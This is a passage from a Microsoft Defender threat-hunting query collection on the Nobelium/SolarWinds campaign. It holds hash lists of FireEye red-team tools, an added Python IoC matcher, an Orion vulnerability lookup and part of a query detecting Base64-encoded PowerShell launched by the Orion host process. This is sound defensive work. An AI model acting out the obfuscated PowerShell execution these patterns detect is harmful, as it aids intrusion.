'd7cfb9fbcf19ce881180f757aeec77dd',
'd93100fe60c342e9e3b13150fd91c7d8',
'db0eaad52465d5a2b86fdd6a6aa869a5',
'dd8805d0e470e59b829d98397507d8c2',
'dfbb1b988c239ade4c23856e42d4127b',
'e0683f8ee787313cfd2c61cd0995a830',
'e4efa759d425e2f26fbc29943a30f5bd',
'e7beece34bdf67cbb8297833c5953669',
'e89efa88e3fda86be48c0cc8f2ef7230',
'e91670423930cbbd3dbf5eac1f1a7cb6',
'ece07daca53dd0a7c23dacabf50f56f1',
'edcd58ba5b1b87705e95089002312281',
'eeedc09570324767a3de8205f66a5295',
'f20824fa6e5c81e3804419f108445368',
'f3dd8aa567a01098a8a610529d892485',
'f41074be5b423afb02a74bc74222e35d',
'f59095f0ab15f26a1ead7eed8cdb4902',
'f7d9961463b5110a3d70ee2e97842ed3',
'fa255fdc88ab656ad9bc383f9b322a76',
'fbefb4074f1672a3c29c1a47595ea261'
]
);
let SHA1Hash= dynamic(
[
'5968670c0345b0ab5404bd84cb60d7af7a625020',
'fb514d59d4beabd97a25c2eefb74ce85b16edaac',
'863514b3c3f88d084bbe27bf7ba59189fbdbd902',
'0c8e807969295237c74a1016c284f99975e761b9',
'226c07a66c530350e9c89ddbe550646e94b5ff96',
'1bfaccc392df6d62fb3d8c9e69b72f0b4c5a478a',
'7bbdbe9f26a3d96e31d648551e66f91a9bd928ab',
'0613d4a7556d13889727e2e3312abfc2f6bbc046',
'c47cf12067a0ddf212a890f26dc8578d8bb705cb',
'9a6e4d1a0b682abc848e5c7a6f8782cb0213fc5c',
'af35d96b1e70d05a0c556bb9fa46af7450db1474',
'f7d483346611ce1d3e5bf8eeebfc7be122a131b9',
'4e1aead0a6c181afbd12c75f8da5a1a01acafc6c',
'8ac4feca574feb39aa887ac24803cc66fc658789',
'ac9db0eb0ef64d4b9fa68f52c713904e6fd4d6e6',
'f142936d2ab1e023ffc39d41a801d18a0c7df398',
'12e46031d953fd0a9a2b0ec573b695420eafd5f2',
'03324510e41c7b9fec35516aca947850d4ef7529',
'5d358567e549a6f8e471697f7c78bc8bdf2a6534',
'33d6eef3c7c5a496cc22acaaa7aed03d59af498a',
'803b1743cb5498543802c14e67a34c61977d73b5',
'4d0c07c7a215ec9d563b0a3e73899e56fcf94566',
'67f7ba6b4c301d372d8fb28cb231fb13a58b1dc9',
'd5adb0dc551c3c97fc929d86e039672b97ddc65e',
'063ede02eb666c16c61135aa27b1a026014cfc77',
'e54f5737847287e49a306f312995c9aba38314d4',
'e74f4f592e17a7c3c9be85b430dddeea2c3abda4',
'ae9d8a3e09b55a45c0452a293dcb01fab556f810',
'a1065c1a5d908796745e9c5be297ea2d402859dc',
'05ddb03cd423042ee6af3a14b6c4c0772eb75757',
'3c0c8e162bb8d42348beb6f4527f303c7487ce96',
'df8543eaddb005dab92ef0cdab7c19b41ef647f8',
'75e87b5ff18b2c53688e43a2e599fd6b3ab06d92',
'268d4e63b8fb38d37556384549717531e50eb65f',
'f4cb5107f1b9755ce0e8f7a7f85f5536fd204019',
'38e866dd44dce667dd19652e28324b6110e808bd',
'218651ac5b575c3f9642c2e9a5928aa22fab8483',
'472af2b122c23bf0ca10c78d389a5a7f030a3536',
'520cab82bb5bcfd8abd2301b648aafe0555044c4',
'b49972eed626571914116bae4446be571598dd81',
'3a4adb4ff64ddcdd0f1b2a86f04d2b72da5d9c92',
'22109552d6af71d392de199e21ae272009db608a',
'ccc5cb5b399bbf9d2959aafdc90233fa4ca9380d',
'849f81a20a4bb9985066d9e38f4adfba07bc5444',
'cc542c0f873470b3eb292f082771eec61c16b3d7',
'590bd7609edf9ea8dab0b5fbc38393a870b329de',
'41c11e48c3a64484b38a2d64ab3b9453bae05a14',
'e468a7947c497b435bdf1a50cf0f73abf849c79b',
'a5c4975199bfe820bd0076bb5b7c68be93ba7bf8',
'f38bf87c73ac188fc60a2bfa5bba1c838148a8a1',
'a1e3e694b147767efcab214f099a1488726abd0f',
'aaa153236b7676899572760482951d3edad7a8b5',
'25be1b61ce1f9dcc498c64a5a753efb96df3ae4c',
'39bb0e9765e0137d09dc8d41fa1dded24e1fdeed',
'5b93345c18faa20ef1f2d3f7fb5a299c27e4b66d',
'f5a605c29af773c9f5604c8f5546c991d24d2dc2',
'db99f1ef9b630fc16deb23d8c7d7df2441bc80e5',
'c226cb69f2a017712cc94493f51d7726f933bcda',
'5b3b08f15ac3bbf2644f88b0615536f33a1ff1a8',
'42f81c4cfca1438371829b7ad5e7b3db54a2cddf',
'1c23dd83c6ebba6f870b1ad02f326ea730ea53a5',
'2b663679da2a7070f91945784ac167ed3ded7280',
'fd1e67da7919dc7d0fbab0c5d02ee6e12537f2ef',
'93c1078cb6d0aeab90eb0b83ec4a737ce7bcccdc',
'05d900d16d2738b0bded3ba4a60ff24adc0776f1',
'fc19e8dae2215446ade30b6bc7aa5d4b0d6627f7',
'f30ef3957c930cf2aa74361d4d229777e7ee40ef',
'964e161dd92df9b160a6f7c7d1dedf216e8fed2c',
'bf4254555a5f4d3299aae8d4ffc28bbb1dfec3c6',
'50726acc45f673d6f0924a8bf030f3f07b1cd9c5',
'd535de08875cef1c49bfa2532281fa1254a8cb93',
'7935da6efb19ea558fe6b1f98f3b244b4a74794b',
'589f7878efd02dd5a0832c6e523f4914cbcfd450',
'8f7d4f9eed06c1d175ef6321fb7110183aabbb7c',
'467b32e7414308b245c6c004303a5638e0fa7bdf',
'b98cded462dfd80c682c953830e3df744cac756d',
'3df6b6fb4870b66931e91a59a5f9c013198bc310',
'c26f164336ea82a40b2186270249d2fe5571b12d',
'e53ff219a6d5d0713ddfa54f8fff7ff703e5e85f',
'fa9905d231bb1565086dcf2608ee2125bf585c01',
'c1fe1a306c4d7106d5a0bb47d3880836d9ecc2c6',
'7323ca7b92edbd195b2d7e18c91fd48b4c96a0cc',
'f9881d2380363cb7b3d316bbf2bde6c2d7089681',
'ca112215ba3abf12bd65e15f018def811b9d5938',
'bcdf6ddccab0c348d85ca52077ffbef12f94a336',
'28a15a0b532c47110297aa6f4f46bad4d72235a2',
'ad5bff008e0e270d19eaa7e211b1c821d4091b68',
'7f308945c4904ef168bbf57c86e56c8a3f836a2e',
'74fc338bbab1a1f42699165c588dc91639d0343b',
'4f3ec6a4af8fddf85a0f2933b6cabee44e74fe33',
'41a491270ec2bd6d230be4d163c719e6d46265e7',
'17e199488c301aad10861cdeb1ee5087d2c87517',
'0225b06163d58bc55c6e4f6b451c5553dc9558c7',
'f6bb18873580f645c09758fda398655ce5e3eff3',
'2933c394fa06892dbd1ce2937b4c2344e8239ef8',
'a6119a5c321b2755bffdb4919d910a18b0613842',
'86e975d05de96e0ea088ffdde9993f9247f0ee03',
'3248ac428a7c888723398a5c2535b5b95f550754',
'b1b5dbea32917b7db654dc193de98b840abdbcb5',
'004809dcd28c0cf078d65cc11a478d50cb3cba0d'
]
);
let SHA256Hash = dynamic(
[
'77bdcb2a9873c4629d8675c8ce9cc8a0cf35c514e27f7a6dc2bc4b31f79dd9e2',
'f937aa71e0b1cb3f9a4d5c0e8ffa4f383b781dd878e71e4b73c1f084b4a7e6de',
'8469341f65cc42b86ef7ded04eca8a00266f34d6d2916330af1bf40fb69e26f0',
'd3ca5583c98a4ab0cc65773addd3444435eea13e70e3929629535f14dfe8b63b',
'2051f5d7c79e67a02880ca9f2fc0cdf4fa8827fc515f16baa743193c9b178ba0',
'4ce2df07fecdc7f7852c686440e3b421c159d8fc382481ce70165a77741fb2c4',
'9e170d1146efeee09f888c7b1bbfb10dec3ede9cc0b20b6b137c52dd146fd302',
'2b7a2703e77cb735fae7b90bbd5a2fa481aea1c34c3fb7bfada61cbcebb35efc',
'd0b6413c3dabe564435291b65f28119ad5a9c1fabc05ee48820f728740cb1a03',
'4be84a291b6c6a5f019c1c6b1ceff3b4bc3668d5874b1a423838a57560788158',
'79f2cd2009fe104e5ed6ad25d0ba06b10fb7c0983e88beab27e55b78cd2a5300',
'c4bb5b85710d7e78e82a57eb2ac2c8f7796972bada1ddc6af7ae6d318bc87aa3',
'a9827ea4e45194c65a3ff6cf03345b16bd24047165bd91d4595caae8488529db',
'59a4ae454be71f8a036a7b4c74ae40f4ca6e7105dabfabb4637e87b7a9afb51d',
'fe33146518676279692217e32f8c36a9749d705981e672ebbde79c80b32dd8b7',
'6e1c976151313a24fbd1f620a0a2c66aaf5489d44b8153eb12e789bfbea3731f',
'5751ac3b127f6c8cf251d995ac6254f8999ab227dd6da870f1e0249b3ce56bb6',
'964efc495e4e1a2075fcd48a661166fb8df81d81d8ac2c26768325dc15da7f70',
'd9882283ee2dc487c2a5fb97f8067051c259c4721cd4aea8c435302fe6b274c4',
'c11d6bdda1972a2f538f0daea099df17ce76077098b9f3f72459cf7db1ec5ec6',
'178dc666df641f4f1f184d54c7bcac4764e81bb1c3b03a7207b321660c77770b',
'5756a54a1d9ae74df58008048c6042e7254cc7eed0389f556db3f000cb191000',
'c828558c67601c94511720748a49703b09814bcd21be2caa98b36faa445e19db',
'a57112c53bf2ee334a6d01b39cb43ec8de42ba18ea925d55132567274b742ce6',
'6e05bebdc38c4bd34c83d2ca6b954ce84c87ed78fd0d932576593a3ad710e3c3',
'25e755c8957163376b3437ce808843c1c2598e0fb3c5f31dc958576cd5cde63e',
'8e16cd7d498eb69d7b3e079e1353e0df6eec70a845986475d7cf65a6740b4434',
'44f3c63c1f6414f2c3e602a57ba38f340287fe2acc15ff0c88dca503c67b1a0c',
'fe664bb9dc2976d6d2ccc07582b5c5eb85b896cc439a9af91db7e51b1c905bdb',
'3805caa8e426a6f7d7d3ce9c87ce188b20185b134d936a69b9d51125b1264dea',
'40db7affc23dcaf88c288d6a918b6371a45dcfa16e08543e9442d4d952a9ecc4',
'4878d5d7933e096305c70c83499b84893b6bd0dbe226e16ea90430efeb8b8593',
'faf76f9e66c7392cddbe7bcc73b00dc2ca2d8d1da6f46f5686dadc2e0a559acb',
'09b1003b673b559c3599dcb9250112bd3a602602f2836b54d5d7cdd1c4c4e6f2',
'3f1d22893c626346f8d361076bc66797d55b09a959ec0d36ec3d48048983f138',
'652d3717353df8fc3145ecc9f2c871034a58f2519bdd0c70a72a3d8c88bad48c',
'078403b4e89ff06d2fe2ed7e75428a381f83ffb708dbd01b0220767498947f0c',
'82cce26c60a5105e6caf5ac92eabb3dedcd883cd075f2056f27b0ec58aefaaa6',
'4d004d168b0bb9bed836404e850796173ac27efd8489738394a265478224cf27',
'6652e27ad1bf5002665b2d0821e75092a087103408560682295f90706a3289cb',
'b051ee189faf36e2d6c382fede530e9274b42bc9c42e210b4ee1bc84b0419ba6',
'0340043481091d92dcfb2c498aad3c0afca2fd208ef896f65af790cc147f8891',
'bfe88e7986fbf27db90f18959a0b1e237b6f0395fa11b9eb386e5bac143c1d2d',
'7404a08ecc0aa0d84f039d078ad39804856206ae58dde360238d4a1943557333',
'efb533249f71ea6ebfb6418bb67c94e8fbd5f2a26cbd82ef8ec1d30c0c90c6c1',
'73233ca7230fb5848e220723caa06d795a14c0f1f42c6a59482e812bfb8c217f',
'9a84cb10b7ba0b96eea473900d58052511af7b235383b6a496dffab9b982d20d',
'9af4272d6cc0e926f74ccf68d0a4d056eb37059214c312ef3628bca45a7d76cf',
'b262d0c81ac5a13c1a6aa650d1ca7b04117f654a2a97bfe7ac4a7ca8ae9a6ed5',
'432010e6d7a42710b10464e440fa4e2df2bb387839d56a5b371727dc6c3da272',
'b58de9beaf70bfd12cd6fb372f52eff5405f96602c22034a80ef01b4f9e2ded4',
'5f0bc27c272937e3ef788c290939481137148c1c5c70dbb7d1fb13cb22e3e2c1',
'7b59090b78127381593460ccea2ea64d6c5838cd8cb0e97c5e436ae58e69cdee',
'e7046b7eac25ceb5274c815aba4384099524eacf9aed683179aa29ac5f45ede8',
'38c1cab0a8c9870f2cc7cfa5f3f782c0bb8ede94ce89a41a5e9509a79d7fdf5e',
'393cd1ecf955d6938f9a9ba65808a209e7741e2fd17baa91e4960aca799be86f',
'681b1b85a0f8a7ede2c6bf8c71ad4cb56ccc4e1bb400783c93ee9b5ab76d3da6',
'd104de2912949e598f12b2b517bdbec17896cee8305766e72bbb4e604205b2b4',
'eb7bada29bcf4c6b94f7ab710a8a6702f26845c9678826ff0dfc7494a5e8186d',
'4a5f1df73581c531e62e73fe1ab374d1d93b3846d8e6b80833fd295e0fbc23f1',
'895d49db09b64f15782073d4ff4a0fe21cd91f9b9fa9902053278799313b13b1',
'99b622046fb5e122a6f2dadad0858cdd1056582701fb0968c57ec6171dc4c0ee',
'8f79942feb0c8533ce01f867902f4a72d328681249fd474b0215e9d9b4477f67',
'948f9fc9b5979fb66e91964bb2bee0b42b7e8f6b6436188fee9fb69b676d2f42',
'356266255b6aa6ba096cd8048a6a43488ffc21845430d7d0f798fd9022879377',
'4e35c7d135bd7f55cdec68d7acf176ae84b850e927fdffb005e000fef5b35a21',
'609aa1b6ebbeb93a76898219ad470832c4dd838fb3214989841af8b90fcef695',
'5e0fb8cab745678487ac1ed99b5ec2fa2d54a65cbf0e2cb9208785200f2c2b8b',
'aa4349b6531544093c4dbc1d2a7b8680d3308cbde313a38c27cd211dd80ee9d1',
'f0a59a724ee6631b7f2ae88aa9ec7c24a82f8c912512352d93d058a928c33c70',
'1cf5710e500a423b84b51fa3afdd923fe0a8255c5817d3238175623e2ebbfad9',
'959be603c11951ead9c13efd0451ba23e743ec3019562f7715c5b0306ae70537',
'0cb570e4e5229dbe488bba92f57b5951a69335dd625aa6ada0ccb34c918613b2',
'60d3a8c8a7e8bdb67a44ad4f220e52593bf46d2ce6e8d40b6db9045c68cee413',
'71b11d28dec1dadc738c4b993dba32e3c33a85421de66120be62f3ec0ed50c3e',
'b6ef03aec5d10e371f0b06c661036d838ef55fa7dc75cf91fca3622bdefa8140',
'791cb9883187ada5274c976a2e05dc756c48eda88fabdfe2eb7e19f59f0182e5',
'1ba2ef33e69d6bc03ba02a68ecd701b1eee6a33aabd44509e3b344d0948cf9f4',
'1353ffc96e0a701fa8b3dc2835a8be6199e3c8f079663ebffb6b665750ef8af9',
'2effc706d002ebf5c18160ba1cec9f88adbc4a36a3daaf5dbacc8c0dd6ad46b6',
'd13ec5610c22bad31a47b59791b6e964d4703b4019094fd44c8151ee802db7ea',
'3ac5a8f9f2f80b7a8b5267a5cd523dd449b2de5ccb7b30e448ef0dcfc8995506',
'c0621954bd329b5cabe45e92b31053627c27fa40853beb2cce2734fa677ffd93',
'899ad5af2b4ad14fa58612dc2938598ac7e892d759659aef87e4db46d70f62bf',
'e1d466b44e0dffafe4a2d0ebade37ea5f9b6a30ccf16f59d4d2e32f9204a03f8',
'a022820a62198fa3e3b89749b38db1cc3a09136524682fb99a3ce36652725065',
'3c9a7aa8cc4fd0538532e757a756709897c94b2653152a40993c7d0a47503980',
'6c8f967b12cf84eed7b8c039e04614e50cd7fcd8ca9e01563bb6f5f0a11dcb8c',
'bb4229d4fe06209fc7c8ed44da8f353dcb980b5f1a5229c7e1f17b772ff8fd8c',
'e2f7afedf6dbeaeae60a1434a8735acd426087fd16689b29b869ebe88cdbef85',
'504be292cf783ce6cb0c356034e69b76a465ec534386a776663810266d64da33',
'42389f51dc60590c2daab696e8782c3f4dd9f9a4c98a3b987e10d43174deba38',
'eec42b1fb5275eaf3e0229db99421e2b16a3c82bb64da3305662622dc2d6e07a',
'33b8b7198b8e9a24b415d280d673cfa4efe4d249ac9e21703a61c65dc0933d74',
'c91e8e5c2491f7708c4e550c18acab121e1b245ade7b2abb79cdd25b8a9cf379',
'b292ae784ab91b99cc2b8f5cc173813cdb52fb75c6dab85bd1ce05a244b85fca',
'629c0a325f24016534ebc2e0578068593ca883557f8c10cc1ae4d5b0ab91bfec',
'bc6d23e865cdbc4d57451e80797be2b2feff531ca2743c533e5d114c3a19433d',
'7b1e06cf7c362e62b156652b069a4ca1800e0ab72730636f64cc24dabd3830a8',
'cc9da7fce451e409a4d994b4675db6a3651a551b9a004461d14a3d3532765d84'
]
);
DeviceFileEvents
| where SHA1 in(SHA1Hash) or SHA256 in(SHA256Hash) or MD5 in(MD5Hash)
| union DeviceImageLoadEvents
| where SHA1 in(SHA1Hash) or SHA256 in(SHA256Hash) or MD5 in(MD5Hash)
```
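The query above compares three hash types against two event tables. The following is an added Python example, not code from this repository, that reproduces the same matching logic offline so it can be exercised before a long indicator list is pasted into Advanced Hunting: it loads a mixed feed such as all-hashes.csv, infers the hash type from the hex length, rejects malformed lines, and compares case-insensitively. The same helper covers the single-hash `find ... where SHA1 == fileHash` pattern used in the cyzfc.dat queries earlier on this page. The indicator lines and event rows in the block are constructed for illustration and are not the FireEye hashes.

```python
"""Offline hash-IoC matcher mirroring the hash-lookup hunting queries.

Added example, not part of the repository. The indicator feed and the event
rows below are constructed; they are not the FireEye hashes from
all-hashes.csv.
"""
import re
from collections import defaultdict

# Hash type is inferred from hex length, so one mixed list (MD5, SHA1, SHA256
# in any order, as in the FireEye CSV) can be loaded without pre-sorting.
HASH_TYPES = {32: "MD5", 40: "SHA1", 64: "SHA256"}
HEX_RE = re.compile(r"^[0-9a-fA-F]+$")


def load_indicators(lines):
    """Group indicators by hash type; skip blanks and comments, collect bad lines.

    Returns ({"MD5": set, "SHA1": set, "SHA256": set}, [rejected lines]).
    Values are lowercased so that matching is case-insensitive.
    """
    by_type = defaultdict(set)
    rejected = []
    for raw in lines:
        value = raw.strip()
        if not value or value.startswith("#"):
            continue
        kind = HASH_TYPES.get(len(value))
        if kind is None or not HEX_RE.match(value):
            rejected.append(raw)
            continue
        by_type[kind].add(value.lower())
    return dict(by_type), rejected


def match_events(events, indicators):
    """Return (event, matched hash type) for each event carrying a listed hash.

    Mirrors `where SHA1 in(...) or SHA256 in(...) or MD5 in(...)`, but compares
    case-insensitively. Kusto's `in()` is case-sensitive; `in~()` is not.
    """
    hits = []
    for ev in events:
        for kind in ("SHA1", "SHA256", "MD5"):
            value = (ev.get(kind) or "").lower()
            if value and value in indicators.get(kind, ()):
                hits.append((ev, kind))
                break
    return hits


# Constructed indicator feed: one hash of each type plus a malformed line.
SAMPLE_FEED = """
# constructed indicators, not real IoCs
0123456789abcdef0123456789abcdef
DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
not-a-hash
""".splitlines()

# Constructed DeviceFileEvents / DeviceImageLoadEvents rows.
SAMPLE_EVENTS = [
    {"Table": "DeviceFileEvents", "DeviceName": "ws01", "FileName": "tool.exe",
     "SHA1": "da39a3ee5e6b4b0d3255bfef95601890afd80709", "SHA256": "", "MD5": ""},
    {"Table": "DeviceImageLoadEvents", "DeviceName": "ws02", "FileName": "x.dll",
     "SHA1": "", "SHA256": "", "MD5": "0123456789ABCDEF0123456789ABCDEF"},
    {"Table": "DeviceFileEvents", "DeviceName": "ws03", "FileName": "ok.exe",
     "SHA1": "ffffffffffffffffffffffffffffffffffffffff", "SHA256": "", "MD5": ""},
]


def run_sample():
    """Load the constructed feed and match it against the constructed events."""
    indicators, rejected = load_indicators(SAMPLE_FEED)
    hits = match_events(SAMPLE_EVENTS, indicators)
    return [(ev["DeviceName"], kind) for ev, kind in hits], rejected


if __name__ == "__main__":
    hits, rejected = run_sample()
    print("hits:", hits)
    print("rejected feed lines:", rejected)
```

One point the offline version makes explicit: Kusto's `in()` is case-sensitive, so a feed whose hashes are uppercase would match nothing against the lowercase hex that the Defender tables normally record; lowercasing the feed first, or using `in~()` in the query, avoids that.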
## Category
This query can be used to detect the following attack techniques and tactics ([see MITRE ATT&CK framework](https://attack.mitre.org/)) or security configuration states.
| Technique, tactic, or state | Covered? (v=yes) | Notes |
|------------------------|----------|-------|
| Initial access | | |
| Execution | | |
| Persistence | | |
| Privilege escalation | v | |
| Defense evasion | | |
| Credential Access | | |
| Discovery | | |
| Lateral movement | | |
| Collection | | |
| Command and control | | |
| Exfiltration | | |
| Impact | | |
| Vulnerability | v | |
| Misconfiguration | | |
| Malware, component | | |
## See also
* [Locate Nobelium implant receiving DNS response](./c2-lookup-from-nonbrowser[Nobelium].md)
* [Locate Nobelium implant receiving DNS response](./c2-lookup-response[Nobelium].md)
* [Compromised certificate [Nobelium]](./compromised-certificate[Nobelium].md)
* [FireEye Red Team tool CVEs [Nobelium]](./fireeye-red-team-tools-CVEs%20[Nobelium].md)
* [View data on software identified as affected by Nobelium campaign](./known-affected-software-orion[Nobelium].md)
* [Locate SolarWinds processes launching suspicious PowerShell commands](./launching-base64-powershell[Nobelium].md)
* [Locate SolarWinds processes launching command prompt with the echo command](./launching-cmd-echo[Nobelium].md)
* [Locate Nobelium-related malicious DLLs created in the system or locally](./locate-dll-created-locally[Nobelium].md)
* [Locate Nobelium-related malicious DLLs loaded in memory](./locate-dll-loaded-in-memory[Nobelium].md)
* [Get an inventory of SolarWinds Orion software possibly affected by Nobelium](./possible-affected-software-orion[Nobelium].md)
* [Anomalous use of MailItemAccess on other users' mailboxes [Nobelium]](../Collection/Anomaly%20of%20MailItemAccess%20by%20Other%20Users%20Mailbox%20[Nobelium].md)
* [Nobelium campaign DNS pattern](../Command%20and%20Control/DNSPattern%20[Nobelium].md)
* [Nobelium encoded domain in URL](../Command%20and%20Control/EncodedDomainURL%20[Nobelium].md)
* [Domain federation trust settings modified](../Defense%20evasion/ADFSDomainTrustMods[Nobelium].md)
* [Discovering potentially tampered devices [Nobelium]](../Defense%20evasion/Discovering%20potentially%20tampered%20devices%20[Nobelium].md)
* [Mail.Read or Mail.ReadWrite permissions added to OAuth application](../Defense%20evasion/MailPermissionsAddedToApplication[Nobelium].md)
* [Suspicious enumeration using Adfind tool](../Discovery/SuspiciousEnumerationUsingAdfind[Nobelium].md)
* [Anomalous use of MailItemAccess by GraphAPI [Nobelium]](../Exfiltration/Anomaly%20of%20MailItemAccess%20by%20GraphAPI%20[Nobelium].md)
* [MailItemsAccessed throttling [Nobelium]](../Exfiltration/MailItemsAccessed%20Throttling%20[Nobelium].md)
* [OAuth apps accessing user mail via GraphAPI [Nobelium]](../Exfiltration/OAuth%20Apps%20accessing%20user%20mail%20via%20GraphAPI%20[Nobelium].md)
* [OAuth apps reading mail via GraphAPI and directly [Nobelium]](../Exfiltration/OAuth%20Apps%20reading%20mail%20both%20via%20GraphAPI%20and%20directly%20[Nobelium].md)
* [OAuth apps reading mail via GraphAPI anomaly [Nobelium]](../Exfiltration/OAuth%20Apps%20reading%20mail%20via%20GraphAPI%20anomaly%20[Nobelium].md)
* [Credentials were added to an Azure AD application after 'Admin Consent' permissions granted [Nobelium]](../Persistence/CredentialsAddAfterAdminConsentedToApp[Nobelium].md)
* [New access credential added to application or service principal](../Persistence/NewAppOrServicePrincipalCredential[Nobelium].md)
* [Add uncommon credential type to application [Nobelium]](../Privilege%20escalation/Add%20uncommon%20credential%20type%20to%20application%20[Nobelium].md)
* [ServicePrincipalAddedToRole [Nobelium]](../Privilege%20escalation/ServicePrincipalAddedToRole%20[Nobelium].md)
## Contributor info
**Contributor:** Dario Brambilla
**GitHub alias:** darioongit
**Organization:** Microsoft 365 Defender
================================================
FILE: Campaigns/known-affected-software-orion[Nobelium].md
================================================
# View data on software identified as affected by Nobelium campaign
This query was originally published in the threat analytics report, *Solorigate supply chain attack*. Please note that these attacks are currently known as the *Nobelium campaign*.
Microsoft detects the [2020 SolarWinds supply chain attack](https://msrc-blog.microsoft.com/2020/12/13/customer-guidance-on-recent-nation-state-cyber-attacks/) implant and its other components as part of a campaign by the Nobelium activity group. Nobelium is the threat actor behind the attack against SolarWinds, which was previously referred to as [*Solorigate*](https://www.microsoft.com/security/blog/2020/12/18/analyzing-solorigate-the-compromised-dll-file-that-started-a-sophisticated-cyberattack-and-how-microsoft-defender-helps-protect/).
Nobelium silently added malicious code to legitimate software updates for Orion, which is IT monitoring software provided by SolarWinds. In this way, malicious dynamic link libraries (DLLs) were distributed to SolarWinds customers.
The following query searches Threat and Vulnerability Management (TVM) data for Orion software known to be affected by the Nobelium campaign.
More Nobelium-related queries can be found listed under the [See also](#see-also) section of this document.
## Query
```kusto
DeviceTvmSoftwareVulnerabilities
| where CveId == 'TVM-2020-0002'
| project DeviceId, DeviceName, SoftwareVendor, SoftwareName, SoftwareVersion
```
## Category
This query can be used to detect the following attack techniques and tactics ([see MITRE ATT&CK framework](https://attack.mitre.org/)) or security configuration states.
| Technique, tactic, or state | Covered? (v=yes) | Notes |
|------------------------|----------|-------|
| Initial access | | |
| Execution | | |
| Persistence | | |
| Privilege escalation | | |
| Defense evasion | | |
| Credential Access | | |
| Discovery | | |
| Lateral movement | | |
| Collection | | |
| Command and control | | |
| Exfiltration | | |
| Impact | v | |
| Vulnerability | | |
| Misconfiguration | | |
| Malware, component | | |
## See also
* [Locate Nobelium implant receiving DNS response](./c2-lookup-from-nonbrowser[Nobelium].md)
* [Locate Nobelium implant receiving DNS response](./c2-lookup-response[Nobelium].md)
* [Compromised certificate [Nobelium]](./compromised-certificate[Nobelium].md)
* [FireEye Red Team tool CVEs [Nobelium]](./fireeye-red-team-tools-CVEs%20[Nobelium].md)
* [FireEye Red Team tool HASHs [Nobelium]](./fireeye-red-team-tools-HASHs%20[Nobelium].md)
* [Locate SolarWinds processes launching suspicious PowerShell commands](./launching-base64-powershell[Nobelium].md)
* [Locate SolarWinds processes launching command prompt with the echo command](./launching-cmd-echo[Nobelium].md)
* [Locate Nobelium-related malicious DLLs created in the system or locally](./locate-dll-created-locally[Nobelium].md)
* [Locate Nobelium-related malicious DLLs loaded in memory](./locate-dll-loaded-in-memory[Nobelium].md)
* [Get an inventory of SolarWinds Orion software possibly affected by Nobelium](./possible-affected-software-orion[Nobelium].md)
* [Anomalous use of MailItemAccess on other users' mailboxes [Nobelium]](../Collection/Anomaly%20of%20MailItemAccess%20by%20Other%20Users%20Mailbox%20[Nobelium].md)
* [Nobelium campaign DNS pattern](../Command%20and%20Control/DNSPattern%20[Nobelium].md)
* [Nobelium encoded domain in URL](../Command%20and%20Control/EncodedDomainURL%20[Nobelium].md)
* [Domain federation trust settings modified](../Defense%20evasion/ADFSDomainTrustMods[Nobelium].md)
* [Discovering potentially tampered devices [Nobelium]](../Defense%20evasion/Discovering%20potentially%20tampered%20devices%20[Nobelium].md)
* [Mail.Read or Mail.ReadWrite permissions added to OAuth application](../Defense%20evasion/MailPermissionsAddedToApplication[Nobelium].md)
* [Suspicious enumeration using Adfind tool](../Discovery/SuspiciousEnumerationUsingAdfind[Nobelium].md)
* [Anomalous use of MailItemAccess by GraphAPI [Nobelium]](../Exfiltration/Anomaly%20of%20MailItemAccess%20by%20GraphAPI%20[Nobelium].md)
* [MailItemsAccessed throttling [Nobelium]](../Exfiltration/MailItemsAccessed%20Throttling%20[Nobelium].md)
* [OAuth apps accessing user mail via GraphAPI [Nobelium]](../Exfiltration/OAuth%20Apps%20accessing%20user%20mail%20via%20GraphAPI%20[Nobelium].md)
* [OAuth apps reading mail via GraphAPI and directly [Nobelium]](../Exfiltration/OAuth%20Apps%20reading%20mail%20both%20via%20GraphAPI%20and%20directly%20[Nobelium].md)
* [OAuth apps reading mail via GraphAPI anomaly [Nobelium]](../Exfiltration/OAuth%20Apps%20reading%20mail%20via%20GraphAPI%20anomaly%20[Nobelium].md)
* [Credentials were added to an Azure AD application after 'Admin Consent' permissions granted [Nobelium]](../Persistence/CredentialsAddAfterAdminConsentedToApp[Nobelium].md)
* [New access credential added to application or service principal](../Persistence/NewAppOrServicePrincipalCredential[Nobelium].md)
* [Add uncommon credential type to application [Nobelium]](../Privilege%20escalation/Add%20uncommon%20credential%20type%20to%20application%20[Nobelium].md)
* [ServicePrincipalAddedToRole [Nobelium]](../Privilege%20escalation/ServicePrincipalAddedToRole%20[Nobelium].md)
## Contributor info
**Contributor:** Microsoft Threat Protection team
================================================
FILE: Campaigns/launching-base64-powershell[Nobelium].md
================================================
# Locate SolarWinds processes launching suspicious PowerShell commands
This query was originally published in the threat analytics report, *Solorigate supply chain attack*. Please note that these attacks are currently known as the *Nobelium campaign*.
Microsoft detects the [2020 SolarWinds supply chain attack](https://msrc-blog.microsoft.com/2020/12/13/customer-guidance-on-recent-nation-state-cyber-attacks/) implant and its other components as part of a campaign by the Nobelium activity group. Nobelium is the threat actor behind the attack against SolarWinds, which was previously referred to as [*Solorigate*](https://www.microsoft.com/security/blog/2020/12/18/analyzing-solorigate-the-compromised-dll-file-that-started-a-sophisticated-cyberattack-and-how-microsoft-defender-helps-protect/).
Nobelium silently added malicious code to legitimate software updates for Orion, which is IT monitoring software provided by SolarWinds. In this way, malicious dynamic link libraries (DLLs) were distributed to SolarWinds customers.
The following query finds events in which the Orion business-layer host process, `SolarWinds.BusinessLayerHost.exe`, launched PowerShell with a command line containing a run of at least 20 Base64 characters, and decodes that run. Attackers encode PowerShell commands in Base64 (for example with the `-EncodedCommand` switch, which takes the Base64 form of UTF-16LE text) to obfuscate what is being run. The query strips the NUL bytes that UTF-16LE decoding produces so the decoded command is readable, and keeps only candidates that contain both uppercase letters and digits, which drops long single-case words and digit-only tokens that happen to match the Base64 character class. Examine the `base64_decoded` column for each hit.
More Nobelium-related queries are listed under the [See also](#see-also) section of this document.
## Query
```kusto
DeviceProcessEvents
// Parent is the Orion host process in which the trojanized DLL runs; =~ is case-insensitive
| where InitiatingProcessFileName =~ "SolarWinds.BusinessLayerHost.exe"
| where FileName =~ "powershell.exe"
// Extract the first run of 20+ Base64 characters (plus optional padding) from the command line
| extend base64_extracted = extract('([A-Za-z0-9+/]{20,}[=]{0,3})', 1, ProcessCommandLine)
// Trim to a multiple of four characters so the decoder receives a valid Base64 length
| extend base64_extracted = substring(base64_extracted, 0, (strlen(base64_extracted) / 4) * 4)
